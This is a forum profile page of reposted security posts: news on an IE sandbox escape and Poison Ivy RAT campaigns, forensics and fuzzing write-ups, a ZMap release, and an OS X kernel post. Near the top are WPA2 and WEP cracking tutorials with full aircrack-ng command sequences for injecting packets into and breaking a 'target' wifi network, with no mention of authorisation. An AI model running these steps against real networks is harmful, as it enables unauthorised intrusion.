Everything posted by Nytro
-
[h=1]Cracking WPA2[/h] Andrew Whitaker Cracking WPA2 using Airmon-ng
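For reference, a minimal sketch of a typical WPA2 handshake-capture workflow with the aircrack-ng suite (my own outline, not taken from Whitaker's material); the interface name, MAC addresses, capture prefix and wordlist path are placeholders:

airmon-ng start wlan0                                                # put the card into monitor mode (creates mon0)
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa2 mon0              # capture on the AP's channel until a WPA handshake is seen
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 mon0      # optional: deauth a client to force a fresh handshake
aircrack-ng -w wordlist.txt -b AA:BB:CC:DD:EE:FF wpa2-01.cap         # dictionary attack against the captured handshake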
-
I also found this: Image Host | Free web hosting for images with direct linking allowed. Use IMG Host to share pictures with friends or to post images on message boards, your MySpace profile or eBay auction. - Simple. If you have other alternatives, post them here so we have something to choose from.
-
Test: I was looking for a site where I can upload images and get a direct link, unlike that junk tinypic which asks me for a CAPTCHA and doesn't give me a direct link. I found this: http://www.pixentral.com For a direct link, right-click, copy image location. Simple and efficient. Screw tinypic. PS: Limitations: - max 2 MB - max 30 days
-
Happy birthday man, you said you'd buy the drinks
-
Jumping Out of IE’s Sandbox With One Click by Dennis Fisher Software vendors often give intentionally vague and boring names to the updates they use to fix security vulnerabilities. The lamer the name, the less attention it may attract from attackers looking to reverse-engineer the patch. There was one patch in Microsoft’s August Patch Tuesday release earlier this month that fit that bill, MS13-059, Cumulative Security Update for Internet Explorer. But hidden inside the big fix was a patch for a vulnerability that enabled a one-click escape of the IE sandbox. The vulnerability was discovered by researcher Fermin J. Serna, a former Microsoft security engineer, and it takes advantage of the way that IE handles some command line options in certain conditions. Serna found that the ElevationPolicy in IE will treat the Microsoft Diagnostic Tool (msdt.exe) as a medium-integrity process if the user requests it to do so. In IE, Protected Mode is the sandbox that is designed to prevent attackers from being able to use one bug in a low-level process to compromise the machine. “Funny thing is that CreateProcess() has a hook inside the LowIL IE process and if you try to CreateProcess(“msdt.exe”) it will get brokered to the IE Medium IL one and applied the Elevation policy there. Some sanitization happens to most of the parameters for security reasons (do not create a Medium IL process where the process token is too unrestricted),” Serna wrote in a blog post explaining the bug. “The vulnerability here is that msdt.exe (that due to its elevation policy will run as medium IL outside of any sandbox) has some interesting command line options. Concretely this one: /path .diagpkg file | .diagcfg file —- Specifies the full path to a diagnostic package. If you specify a directory, the directory must contain a diagnostic package. You cannot use the /path parameter in conjunction with the /id, /dci, or /cab parameter.” Serna said that using the vulnerability, he could cause the msdt.exe process to display some strings that he controls to the user. If the user clicks the continue button on the dialog box, his code will run and he’s escaped the sandbox in the browser. He said that executing the attack would be trivial under the right conditions. “Assuming you have code execution at the sandboxed process though some other bug (let’s say the common use after free problem all browsers suffer) then it is not easy but trivial. This sandbox escape vulnerability is not a memory corruption that can fail but a logical one that does not fail. The only requirement is the attacked user has to click a “continue” button on a dialog with attacker controlled messages. This is the reason for a one click versus a full 0 click where the user does not see anything,” Serna said via email. Sursa: Jumping Out of IE's Sandbox With One Click | Threatpost
-
How to Crack WEP Key With Backtrack 5 [wifi hacking]

As announced before, we would be writing about wifi attacks and security. This post is the second part of our series on wifi attacks and security. In the first part we discussed various terminologies related to wifi attacks and security and covered a couple of attacks. This post will show you how easily one can crack WEP keys in no time.

Security Issues With WEP
WEP (Wired Equivalent Privacy) was proved full of flaws back in 2001. The WEP protocol itself has weaknesses which allow attackers to crack it in no time. The biggest flaw is probably that WEP uses a 40-bit key with a 24-bit initialization vector, which means there are only about 16 million possible IVs. For more information on WEP flaws, kindly read the WEP flaws section here.

Requirements
Here is what you need to crack a WEP key:
1. Backtrack or any other Linux distro with aircrack-ng installed
2. A wifi adapter capable of injecting packets. For this tutorial I will use the Alfa AWUS036H, which is a very popular card and performs well with Backtrack. You can find compatible wifi card lists here.

Procedure
First log in to your Backtrack / Linux and plug in your wifi adapter. Open a new console and type the following command:
ifconfig wlan0 up
where wlan0 is the name of the wireless card; it can be different. To see all wireless cards connected to your system simply type "iwconfig".

Putting your WiFi Adapter on Monitor Mode
To begin, you'll need to put your wireless adapter into monitor mode. Monitor mode is the mode whereby your card can listen to every packet in the air. You can put your card into monitor mode by typing the following command:
airmon-ng start (your interface)
Example:
airmon-ng start wlan0
Now a new interface mon0 will be created. You can see that the new interface is in monitor mode by entering "iwconfig mon0" as shown.

Finding a suitable Target
After putting your card into monitor mode, we need to find a network that is protected by WEP. You can discover the surrounding networks by entering the following command:
airodump-ng mon0
Bssid shows the MAC address of the AP, CH shows the channel on which the AP broadcasts, Essid shows the name broadcast by the AP, and Cipher shows the encryption type. Now look out for a WEP protected network. In my case I'll take "linksys" as my target for the rest of the tutorial.

Attacking The Target
Now to crack the WEP key you'll have to capture the target's data into a file. To do this we use the airodump tool again, but with some additional switches to target a specific AP and channel. Most importantly, you should restrict monitoring to a single channel to speed up data collection; otherwise the wireless card has to alternate between all channels. You can restrict the capture by giving the following command:
airodump-ng mon0 --bssid (bssid of target) -c (channel) -w (file name to save)
As my target is broadcast on channel 6 and has the bssid "98:fc:11:c9:14:22", I give the following command and save the captured data as "RHAWEP":
airodump-ng mon0 --bssid 98:fc:11:c9:14:22 -c 6 -w RHAWEP

Using Aireplay to Speed up the cracking
Now you'll have to capture at least 20,000 data packets to crack WEP. This can be done in two ways. The first is a passive attack: wait for a client to connect to the AP and then start capturing the data packets. This method is very slow; it can take days or even weeks to capture that many data packets. The second method is an active attack: this method is fast and only takes minutes to generate and inject that many packets. In an active attack you'll have to do a fake authentication (connect) with the AP, then generate and inject packets. This can be done very easily by entering the following command:
aireplay-ng -1 3 -a (bssid of the target) (interface)
In our case we enter:
aireplay-ng -1 3 -a 98:fc:11:c9:14:22 mon0
After doing a fake authentication, it's now time to generate and inject ARP packets. To do this you'll have to open a new konsole simultaneously and type the following command:
aireplay-ng -3 -b (bssid of target) -h (MAC address of mon0) (interface)
In our case we enter:
aireplay-ng -3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0
If this step was successful you'll see lots of data packets in the airodump capture as shown. Wait till it reaches 20,000 packets; better still, wait till it reaches around 80,000 to 90,000 packets. It's simple: the more packets, the less time to crack. Once you've captured enough packets, close all the processes by clicking the close (x) button on each terminal.

Cracking the WEP key using Aircrack
Now it's time to crack the WEP key from the captured data. Enter the following command in a new konsole to crack the WEP key:
aircrack-ng (name of the file)
In our case we enter:
aircrack-ng RHAWEP-01.cap
Within a few minutes Aircrack will crack the WEP key as shown. Once the crack is successful you will be left with the KEY! Remove the colons from the output and you'll have your WEP key.

Hope you enjoyed this tutorial. For further doubts and clarifications please post your comments.

Sursa: Learn everything about window,hacking,buy e-gift vouchers
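To recap, here is the whole workflow from the tutorial collected into one copy-paste sequence; the BSSID, channel, monitor-interface MAC and capture name are the example values used above and should be replaced with your own:

airmon-ng start wlan0
airodump-ng mon0                                                  # find a WEP network, note its BSSID and channel
airodump-ng mon0 --bssid 98:fc:11:c9:14:22 -c 6 -w RHAWEP         # capture only the target AP on its channel
aireplay-ng -1 3 -a 98:fc:11:c9:14:22 mon0                        # fake authentication with the AP
aireplay-ng -3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0     # ARP replay to generate traffic quickly
aircrack-ng RHAWEP-01.cap                                         # run once enough IVs have been captured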
-
Poison Ivy RAT Spotted in Three New Attacks by Michael Mimoso The Poison Ivy remote access Trojan may be old, but it’s not losing favor with nation states that continue to make it the center piece of targeted attacks. Three groups of hackers, reportedly all with ties to China and possibly related in terms of their funding and training, are currently managing campaigns using the RAT to steal data from organizations and monitor individuals’ activities. Researchers at FireEye said the three campaigns target different industries yet share some of the same builder tools, employ passwords written in the same semantic pattern, and use phishing emails in their campaigns that are written in English using a Chinese language keyboard. So much for the notion of targeted, persistent attacks requiring zero-day malware. “There is a noticeable infrastructure built around using this tool; it’s clear they’ve trained a number of people to use and operate it,” said Darien Kindlund, manager of threat intelligence at FireEye. “It’s effective and there’s no need to change their tactics, which is why they’re still using it.” Kindlund said, however, that enterprise security managers and operations teams can become complacent when it comes to Poison Ivy, dismissing it as a crimeware tool and missing its potential to still infect many machines as it moves laterally looking for more vulnerable machines or data it targets. “What’s easy for these threat actors is they’re using easy-to-use tools that are point-and-click and it becomes easy to blend in with crimeware groups, easy to blend into the noise and discount their presence when a defender identifies a Poison Ivy infection,” Kindlund said. “They might remediate a single infected machine rather than think it’s one of 50 compromises and a large-scale infection. That gives the adversary more time to change tactics and move laterally to other systems, making it harder to detect.” Another reason Poison Ivy still finds favor with attackers is that, unlike Gh0stRAT or Dark Comet, it’s difficult to detect when Poison Ivy beacons out to its command and control infrastructure in order to receive more instructions. “Compared to Gh0stRAT, which uses zlib compression to obfuscate communication out, if a network operator sees that traffic beaconing out, it’s easy to decode that traffic to figure out what walked out door,” Kindlund said. “Poison Ivy uses Camellia encryption, which makes it more difficult to figure out what walked out the door.” The three attacks currently are fundamentally familiar. The first, named admin@338 for the password used by the attacker, targets international financial firms that specialize in the analysis of global or country-specific economic policies. It uses malicious email attachments to infect endpoints with Poison Ivy, which then downloads additional malware to steal intelligence in order to monetize insider information to make a market play or for geo-political reasons, Kindlund said. The second attack, named th3bug for its password, spiked last year, FireEye said. It focuses on higher education and international health care and high tech firms in order to steal intellectual property or new research that has yet to be published by a university team. Most of these are watering hole attacks where a regional website frequented by the targets is compromised and exploit code is injected onto the victim’s machine that redirects them to Poison Ivy. 
The third attack, dubbed menuPass, has been the most active of the three and dates back to 2009, spiking last year. It targets the defense industry and international government agencies trying to steal military intelligence. Spear phishing campaigns include attachments infected with Poison Ivy that are meant to look like a purchase order or price quote that would be fairly specific to the victim, Kindlund said. “They’ve done their homework and looked at the trust relationships of the target—who does this defense contractor do business with—and spoof an email from that partner and send an email through that channel,” Kindlund said. “These three groups have ties back to China; they all use a separate command and control infrastructure, but all three have a backend presence in that country.” Meanwhile, the company is releasing a free tool based on the open source ChopShop kit developed by MITRE Corp. The module is Poison Ivy specific, similar to other modules built for Gh0stRAT and will allow a security or network operations person to decode Poison Ivy traffic. *Poison Ivy image via uwdigitalcollections‘ Flickr photostream, Creative Commons Sursa: Poison Ivy RAT Spotted in Three New China Attacks | Threatpost Old schooleri
-
Fraud
-
http://suport.romtelecom.ro/app/answers/detail/a_id/90/~/cum-pot-apela-1930---v%E3%A2nz%E4%83ri-%E5%9Fi-rela%E5%B3ii-cu-clien%E5%B3ii-din-str%E4%83in%E4%83tate%3F http://www.romtelecom.ro/termeni-legali/termeni-si-conditii-myaccount http://economie.hotnews.ro/stiri-telecom-7174542-cum-ajung-abonatii-romtelecom-clienti-fara-voie-societatii-asigurari-astra.htm
-
Inside the Mind of a Famous Hacker When he was just 15 years old, Michael “MafiaBoy” Calce managed to shut down several major websites including CNN, Dell, Amazon, Yahoo!, eBay, and E-Trade with a series of denial of service attacks. Now, more than a decade later, he talks about how the hacker culture has changed and what users can do to protect themselves. How He Toppled the Web Giants In 2000, Calce targeted CNN.com after another hacker claimed the site would be impossible to bring down because of its “advanced networks” and “huge traffic numbers.” He managed to slow down CNN’s site for nearly two hours . Denial of service attacks involve bombarding a site or application with so many requests that the server is unable to keep up. Calce modified a denial of service attack written by another hacker and trained approximately 200 university networks under his control to a specific target. The attack against Yahoo! was by accident, Calce said. He had put in the IP addresses into the script, and then gone to school, forgetting the script was still running. He came home to find his computer had crashed, and didn’t realize what had happened until he heard the news reports later. Calce’s activities were “illegal, reckless and, in many ways, simply stupid,” he said, adding that he really had not understood the consequences of his actions. “It’s So Easy It’s Scary” More than a decade later, it’s easier to launch attacks now than it was then, Calce said. A lot of the companies are completely unaware that they are at risk, and that needs to change. Back when he was actively targeting sites, you had to work and build your own arsenal of tools before launching an attack. Now there are hacker desktops and ready-to-go tools that anyone can download, install, and go. “If you’re interested and you want to be a hacker, you can be a hacker in 30 minutes,” Calce said. Different Mentality, Motivations Calce and his fellow hackers were driven by curiosity and desire to understand how things worked. That is where the term “hacker” originated, after all. A hacker refers to anybody interested in manipulating technology to do something other than its original purpose. “That’s not necessarily a bad thing,” Calce said. “Everyone at that point in time was running tests and seeing what they could do and what they could infiltrate,” Calce said. The current generation is motivated by money, or desire to destroy. “It’s much more about monetary gain, whereas we were pushing the status quo,” Calce said. And even when there doesn’t seem to be an obvious financial motive, that doesn’t mean it isn’t there. Hacktivist groups such as “Anonymous” and “Lulzsec” are a “different breed,” Calce said. While they have political motivations, some of them do have malicious goals. They are not pure white-hat, or pure black-hat, but more grey-hat hackers Calce said. There will be more hacktivism since people have figured out how to use technology to fight back and draw more attention to their cause. “I don’t condone what they’re doing, but I understand their point,” Calce said. Safe Security Online With attack motivations shifting to monetary gain, the attack focus has also shifted, and individual users are just as likely to be targeted as large companies. Users need to use strong passwords to protect their accounts. They need to be long and complex. Password managers help keep track of strong passwords, Calce said. They should also think about installing personal firewall software on their computers to block malicious traffic. 
A firewall can also warn you when an application is trying to access the Internet. If you are not using Bluetooth, it should be turned off so that other devices cannot connect to your computer. And finally, users should beware of open wireless networks because it is incredibly easy to eavesdrop on what you are doing, and people don’t realize this, Calce said. Hacking will never go away, and users can take some steps to protect themselves, but ultimately, organizations need to invest in security to protect their end users, Calce said. Sursa: Inside the Mind of a Famous Hacker | ZoneAlarm Security Blog
-
[h=1]Web Framework Vulnerabilties - Abraham Kang[/h]
from OWASP AppSec USA

Title: Web Framework Vulnerabilities

Abstract
This talk will give participants an opportunity to practically code review Web Application Framework based applications for security vulnerabilities. The material in this talk covers the common vulnerability anti-patterns which show up in applications built on the most popular enterprise web application frameworks (Struts 2, Spring MVC, Ruby on Rails, and .NET MVC). Sample applications are provided with guided tasks to ease participants into understanding the vulnerabilities in each framework and the overall steps a code reviewer should follow to identify these vulnerabilities. This talk is a trimmed down version of the 3 hour workshop given at Blackhat. This is an advanced talk, and an understanding of the application frameworks is a prerequisite to get the most out of it.

*****

Speaker: Abraham Kang, Principal Security Researcher, HP Fortify
Abraham Kang is fascinated with the nuanced details associated with programming languages and their associated APIs in terms of how they affect security. Abraham has a Bachelor of Science from Cornell University. Abraham currently works for HP Fortify as a Principal Security Researcher. Prior to joining Fortify, Abraham worked with application security for over 10 years, with the most recent 4 years being a security code reviewer at Wells Fargo. Abraham is focused on application, framework, and mobile security and has presented his findings at Blackhat USA, BSIDES, OWASP, Baythreat and HP Protect.

*****

Date: Friday October 26, 2012 3:00pm - 3:45pm
Location: AppSecUSA, Austin, TX. Hyatt Regency Hotel.
Track: Attack

Sursa: Web Framework Vulnerabilties - Abraham Kang on Vimeo
-
[h=1]Visualizing Recovered Executables from Memory Images[/h]
jessekornblum (jessekornblum) wrote,

I like to use a picture to help explain how we can recover executables from memory images. For example, here's the image I was using in 2008: This post will explain what's happening in that picture (how PE executables are loaded and recovered) and provide a different visualization of the process. Instead of just a stylized representation, we can produce pictures from actual data. This post explains how to do that and the tools used in the process.

When executables are loaded from the disk, Windows uses the PE header to determine how many pages, and with which permissions, will be allocated for each section. The header describes the size and location of each section on the disk and its size and location in memory. Because the sections need to be page aligned in memory, but not on the disk, this generally results in some space being added between the sections when they're loaded into memory. There are also changes made in memory due to relocations and imported functions.

When we recover executables from memory, we can use the PE header to map the sections back to their size and locations as they were on the disk. Generally memory forensics tools don't undo the other modifications made by the Windows loader. The changes made in memory remain in the new version we recover. In addition, due to paging and other limitations we don't always get all of the pages of the executable from memory. They could have been paged out, are invalid, or were never loaded in the first place.

That's a tidy description of the picture above. The reality, of course, is a little messier. I've used my colorize and filecompare tools to produce visualizations for an executable on the disk, what it looked like in memory, and what it looked like when recovered from the memory image. In addition to those tools, I used the Volatility™ memory forensics framework [1] and the Picasion tool for making animated gifs [2]. For the memory image, I'm using the xp-laptop memory image from the NIST CFReDS project [3]. In particular, we'll be looking at cmd.exe, process 3256.

Here's a representation of the original executable from the disk as produced with colorize. This image is a little different than some of the others I've posted before. Instead of being vertically oriented, it's horizontal. The data starts at the top left, and then goes down and then right. I've also changed the images to be 512 pixels wide instead of the default 100. I made the image this way to make it appear similar to the image at the start of this post. Here's the command I used to generate the picture:

$ colorize -o -w 512 cmd.exe

and here's the result: http://jessekornblum.com/tools/colorize/img/cmd.exe.bmp

It gets interesting when we compare this picture to the data we can recover from the memory image. First, we can recover the in-memory representation of the executable using the Volatility™ plugin procmemdump. In the files generated by this plugin the pages are memory aligned, not disk aligned.
Here's the command line to run the plugin:

$ python vol.py -f cases/xp-laptop-2005-07-04-1430.vmem --profile=WinXPSP2x86 procmemdump --pid=3256 --dump-dir=output
Volatile Systems Volatility Framework 2.3_alpha
Process(V)  ImageBase   Name                  Result
----------  ----------  --------------------  ------
0x8153f480  0x4ad00000  cmd.exe               OK: executable.3256.exe

Here's how we can colorize it:

$ mv executable.3256.exe executable-procmemdump.3256.exe
$ colorize -o -w 512 executable-procmemdump.3256.exe

Which leads to this result: http://jessekornblum.com/tools/colorize/img/executable-procmemdump.3256.exe.bmp

There's a lot going on here, but things will get clearer with a third image. For the third picture we'll recover the executable again, but this time realigning the sections back to how they were on the disk. This is done by parsing the PE header in memory and using it to undo some of the changes made when it was loaded. We can do this using the procexedump plugin, like this:

$ python vol.py -f xp-laptop-2005-07-04-1430.vmem --profile=WinXPSP2x86 procexedump --pid=3256 --dump-dir=output
Volatile Systems Volatility Framework 2.3_alpha
Process(V)  ImageBase   Name                  Result
----------  ----------  --------------------  ------
0x8153f480  0x4ad00000  cmd.exe               OK: executable.3256.exe

We repeat the process for colorizing this sample:

$ mv executable.3256.exe executable-procexedump.3256.exe
$ colorize -o -w 512 executable-procexedump.3256.exe

Which produces this image: http://jessekornblum.com/tools/colorize/img/executable-procexedump.3256.exe.bmp

First, let's compare the recovered executable back to the original. Even before we start our visualizations, we can see there were changes between the original and this version. The MD5 hashes of the two files are different:

$ md5deep -b cmd.exe executable-procexedump.3256.exe
eeb024f2c81f0d55936fb825d21a91d6  cmd.exe
ff8a9a332a9471e1bf8d5cebb941fc66  executable-procexedump.3256.exe

Amazingly, however, they match using fuzzy hashing via the ssdeep tool [4]:

$ ssdeep -bda cmd.exe executable-procexedump.3256.exe
executable-procexedump.3256.exe matches cmd.exe (66)

There's also a match with the sdhash similarity detection tool [5]:

$ sdhash -g -t 0 cmd.exe executable-procexedump.3256.exe
cmd.exe|executable-procexedump.3256.exe|046

(You haven't heard of sdhash? Don't get tunnel vision! There are many similarity detection tools.) Those matches are good signs. But attempting to compare the colorized image of the recovered executable back to the original is a little tricky. To make it easier, I made a kind of blink comparator. The free site Picasion allows you to make animated GIFs from submitted pictures. Combined with some annotations on the pictures, here's the result: There are two important things to notice here. First, we didn't recover all of the executable. The bands of black which appear on the left-hand side in the recovered image are pages which weren't found in memory. Also notice how much of the data from the end of the file is missing, too. Almost all of it! (Isn't it amazing that fuzzy hashing can still generate a match between these two files?) The second thing to notice is the changes in the data. It's a little hard to see in the GIF, but you can get a better view using the filecompare and colorize tools together.
We can compare the two files at the byte level and then colorize the result:

$ filecompare -b 1 cmd.exe executable-procexedump.3256.exe > orig-to-exe.dat
$ colorize -o -w 512 orig-to-exe.dat

Here's the result: http://jessekornblum.com/tools/colorize/img/orig-to-exe.dat.bmp

Here we can clearly see, in red, the changes throughout the file. The blocks of mostly red, or heavily speckled red, are the places where we weren't able to recover data from the memory image. Because some of the values in the original executable were zeros, those appear to match the zeros we recovered from the memory image--hence the speckled pattern. In the changes to the executable you can clearly see a pattern of dashed red lines.

Finally, we can visualize the changes between the in-memory representation of the file and the disk representation of the file. I've made another animated GIF, this time between these versions of the executable as recovered by procexedump and procmemdump: The most obvious difference between these two pictures is the black band on the left-hand side of the image. That's the space, created by the realignment from disk to memory, being added by the Windows loader to page align the first section of the executable.

[h=3]References[/h]
[1] The Volatility™ framework, https://code.google.com/p/volatility/. Volatility™ is a trademark of Verizon. Jesse Kornblum is not sponsored or approved by, or affiliated with Verizon.
[2] Picasion.com, Picasion GIF maker - Create GIF animations online - Make an Animated GIF.
[3] The Computer Forensic Reference Data Sets project, National Institute of Standards and Technology, The CFReDS Project.
[4] Jesse Kornblum, ssdeep, Fuzzy Hashing and ssdeep.
[5] Vassil Roussev, sdhash, http://sdhash.org/.

Sursa: jessekornblum: Visualizing Recovered Executables from Memory Images
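If you want to extend the experiment, here is a small sketch (my own, not from the post) that dumps several processes with procexedump and fuzzy-matches each recovered binary against a known-good copy; the PID list and the reference file are hypothetical:

$ for pid in 3256 1668; do \
    python vol.py -f xp-laptop-2005-07-04-1430.vmem --profile=WinXPSP2x86 \
      procexedump --pid=$pid --dump-dir=output; \
  done                                              # recover each process image, realigned to its on-disk layout
$ ssdeep -bda cmd.exe output/executable.*.exe       # report any recovered dump that fuzzy-matches the reference binary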
-
In-Memory fuzzing with Pin
by Jonathan Salwan - 2013-08-17

In my previous blog post, I talked about taint analysis and pattern matching with Pin. In this short post, I will again talk about Pin, but this time about in-memory fuzzing.

1 - In-Memory fuzzing

1.1 - Little introduction

In-memory fuzzing is a technique which consists of targeting and testing a specific basic block, function or portion of a program. To be honest, this technique is not really satisfactory over a large portion of code; it is mainly used for a quick analysis. However, it's really straightforward to implement. For that, we just need to:
1. Choose a targeted piece of code.
2. Set a breakpoint before and after our targeted area.
3. Save the execution context when the first breakpoint occurs.
4. Restore the execution context when the second breakpoint occurs.
5. Catch the SIGSEGV signal.
6. Repeat operations 3 and 4 until a crash occurs.

1.2 - Little example

For a little example, see the following graph. Now, imagine that the user can control the first argument; that means he can control the rdi register in the first basic block and [rbp+var_4] in this stack frame. In this case, we are interested in testing the orange basic block. As you can see below, in the orange basic block we have a "mov eax, [rbp+var_4]", which means we can control the eax register. So, we will apply the in-memory fuzzing technique in this basic block between the "cdqe" and "mov eax, 0" instructions, and we will fuzz the eax register.

Using the Pin API

The Pin API provides everything we need to apply the in-memory fuzzing technique. To catch the signals, we use the PIN_InterceptSignal() function. This function takes the type of signal and a callback. So, to catch the SIGSEGV signal, in our main function we have something like this:
PIN_InterceptSignal(SIGSEGV, catchSignal, 0);
Our callback catchSignal just displays the current context when the signal occurs. Then, because Pin is a DBI (Dynamic Binary Instrumentation) framework, we can't set a breakpoint, but that's not really important. With a DBI framework we can control each instruction before and after its execution. So, we will use the PIN_SaveContext() and PIN_ExecuteAt() functions when the first and last targeted instructions occur. A CONTEXT in Pin is just the register state of the processor. That means, when you call PIN_SaveContext(), you save only the state of the registers, not the memory. So, to monitor STORE accesses, we use the INS_MemoryOperandIsWritten() function. When a STORE occurs, we save the original value and we restore it when the context is restored. That's all; you can see the full source code here.

In-Memory fuzzing Pin tool

This Pin tool requires three arguments and can take three optional arguments.
Required
--------
-start <address>    The start address of the fuzzing area
-end <address>      The end address of the fuzzing area
-reg <register>     The register which will be fuzzed

Optional
--------
-startValue <value>              The start value
-maxValue <value>                The end value
-fuzzingType <"inc" | "random">  Type of fuzzing: incremental or random

If we take the above example and we want to fuzz the orange basic block, we have something like this:

$ time pin -t ./InMemoryFuzzing.so -start 0x4005a5 -end 0x4005bb -reg rax -fuzzingType inc \
  -startValue 1 -maxValue 0x3000 -- ./test 1 > dump
[2] 8472 segmentation fault
0.53s user 0.20s system 99% cpu 0.729 total

I used the "time" command to show you how efficient Pin is - I've also redirected stdout to a file called 'dump' because of the output log size (5.5M). At the end of this dump, you can see the context when the SIGSEGV occurs - Current RIP = 0x4005a5 "movzx eax, byte ptr [rax]" with RAX = 0x2420.

[Restore Context]
[Save Context]
[CONTEXT]=----------------------------------------------------------
RAX = 0000000000002420  RBX = 0000000000000000
RCX = 00007fff3134c168  RDX = 00007fff3134abe0
RDI = 0000000000000001  RSI = 00007fff3134abe0
RBP = 00007fff3134abc0  RSP = 00007fff3134abb0
RIP = 00000000004005a5
+-------------------------------------------------------------------
+--> 4005a5: cdqe
+--> 4005a7: add rax, qword ptr [rbp-0x10]
+--> 4005ab: movzx eax, byte ptr [rax]

/!\ SIGSEGV received /!\

[SIGSGV]=----------------------------------------------------------
RAX = 00007fff3134d000  RBX = 0000000000000000
RCX = 00007fff3134c168  RDX = 00007fff3134abe0
RDI = 0000000000000001  RSI = 00007fff3134abe0
RBP = 00007fff3134abc0  RSP = 00007fff3134abb0
RIP = 00000000004005ab
+-------------------------------------------------------------------

You can download this Pin tool here.

Sursa: shell-storm | In-Memory fuzzing with Pin
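Based on the options listed above, the same run can presumably also be driven in random mode instead of incrementing the register; a hedged variant of the author's command line (same addresses and target binary, only the fuzzing options changed, and it is an assumption that random mode works without explicit bounds):

$ time pin -t ./InMemoryFuzzing.so -start 0x4005a5 -end 0x4005bb -reg rax \
  -fuzzingType random -- ./test 1 > dump    # random values in rax instead of an incremental sweep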
-
ZMap The Internet Scanner v1.0.3 released ZMap is an open-source network scanner that enables researchers to easily perform Internet-wide network studies. With a single machine and a well provisioned network uplink, ZMap is capable of performing a complete scan of the IPv4 address space in under 45 minutes, approaching the theoretical limit of gigabit Ethernet. ZMap can be used to study protocol adoption over time, monitor service availability, and help us better understand large systems distributed across the Internet. ZMap is designed to perform comprehensive scans of the IPv4 address space or large portions of it. While ZMap is a powerful tool for researchers, please keep in mind that by running ZMap, you are potentially scanning the ENTIRE IPv4 address space at over 1.4 million packets per second. Before performing even small scans, we encourage users to contact their local network administrators and consult our list of scanning best practices. By default, ZMap will perform a TCP SYN scan on the specified port at the maximum rate possible. A more conservative configuration that will scan 10,000 random addresses on port 80 at a maximum 10 Mbps can be run as follows: $ zmap --bandwidth=10M --target-port=80 --max-targets=10000 --output-file=results.txt Download: https://zmap.io/download.html
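As a further hedged example (not taken from the ZMap documentation quoted above), the same conservative settings can be pointed at a single network range instead of the whole Internet, assuming the usual short forms of the options shown above; the subnet, port and file name are placeholders:

$ zmap -p 443 -B 10M -n 10000 -o https-hosts.txt 198.51.100.0/24   # scan one /24 on port 443 at 10 Mbps, stop after 10,000 targets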
-
Hacking the OS X Kernel for Fun and Profiles Posted on Tuesday, August 13, 2013. My last post described how user-level CPU profilers work, and specifically how Google’s pprof profiler gathers its CPU profiles with the help of the operating system. The specific feature needed from the operating system is the profiling timer provided by setitimer(2) and the SIGPROF signals that it delivers. If the operating system’s implementation of that feature doesn’t work, then the profiler doesn’t work. This post looks at a common bug in Unix implementations of profiling signals and the fix for OS X, applied by editing the OS X kernel binary. If you haven’t read “How to Build a User-Level CPU Profiler,’’ you might want to start there. Unix and Signals and Threads My earlier post referred to profiling programs, without mention of processes or threads. Unix in general and SIGPROF in particular predate the idea of threads. SIGPROF originated in the 4.2BSD release of Berkeley Unix, published in 1983. In Unix at the time, a process was a single thread of execution. Threads did not come easily to Unix. Early implementations were slow and buggy and best avoided. Each of the popular Unix variants added thread support independently, with many shared mistakes. Even before we get to implementation, many of the original Unix APIs are incompatible with the idea of threads. Multithreaded processes allow multiple threads of execution in a single process address space. Unix maintains much per-process state, and the kernel authors must decide whether each piece of state should remain per-process or change to be per-thread. For example, the single process stack must be split into per-thread stacks: it is impossible for independently executing threads to be running on a single stack. Because there are many threads, thread stacks tend to be smaller than the one big process stack that non-threaded Unix programs had. As a result, it can be important to define a separate stack for running signal handlers. That setting is per-thread, for the same reason that ordinary stacks are per-thread. But the choice of handler is per-process. File descriptors are per-process, but then one thread might open a file moments before another thread forks and execs a new program. In order for the open file not to be inherited by the new program, we must introduce a new variant of open(2) that can open a file descriptor atomically marked “close on exec.’’ And not just open: every system call that creates a new file descriptor needs a variant that creates the file descriptor “close on exec.’’ Memory is per-process, so malloc must use a lock to serialize access by independent threads. But again, one thread might acquire the malloc lock moments before another thread forks and execs a new program. The fork makes a new copy of the current process memory, including the locked malloc lock, and that copy will never see the unlock by the thread in the original program. So the child of fork can no longer use malloc without occasional deadlocks. That’s just the tip of the iceberg. There are a lot of changes to make, and it’s easy to miss one. Profiling Signals Here’s a thread-related change that is easy to miss. The goal of the profiling signal is to enable user-level profiling. The signal is sent in response to a program using up a certain amount of CPU time. 
More specifically, in a multithreaded kernel, the profiling signal is sent when the hardware timer interrupts a thread and the timer interrupt handler finds that the execution of that thread has caused the thread's process's profiling timer to expire. In order to profile the code whose execution triggered the timer, the profiling signal must be sent to the thread that is running. If the signal is sent to a thread that is not running, the profile will record idleness such as being blocked on I/O or sleeping as execution and will be neither accurate nor useful.

Modern Unix kernels support sending a signal to a process, in which case it can be delivered to an arbitrary thread, or to a specific thread. Kill(2) sends a signal to a process, and pthread_kill(2) sends a signal to a specific thread within a process. Before Unix had threads, the code that delivered a profiling signal looked like psignal(p, SIGPROF), where psignal is a clearer name for the implementation of the kill(2) system call and p is the process with the timer that just expired. If there is just one thread per process, delivering the signal to the process cannot possibly deliver it to the wrong thread. In multithreaded programs, the SIGPROF must be delivered to the running thread: the kernel must call the internal equivalent of pthread_kill(2), not kill(2).

FreeBSD and Linux deliver profiling signals correctly. Empirically, NetBSD, OpenBSD, and OS X do not. (Here is a simple C test program.) Without correct delivery of profiling signals, it is impossible to build a correct profiler.

OS X Signal Delivery

To Apple's credit, the OS X kernel sources are published and open source, so we can look more closely at the buggy OS X implementation. The profiling signals are delivered by the function bsd_ast in the file kern_sig.c. Here is the relevant bit of code:

void
bsd_ast(thread_t thread)
{
    proc_t p = current_proc();
    ...
    if (timerisset(&p->p_vtimer_prof.it_value)) {
        uint32_t microsecs;
        task_vtimer_update(p->task, TASK_VTIMER_PROF, &microsecs);
        if (!itimerdecr(p, &p->p_vtimer_prof, microsecs)) {
            if (timerisset(&p->p_vtimer_prof.it_value))
                task_vtimer_set(p->task, TASK_VTIMER_PROF);
            else
                task_vtimer_clear(p->task, TASK_VTIMER_PROF);
            psignal(p, SIGPROF);
        }
    }
    ...
}

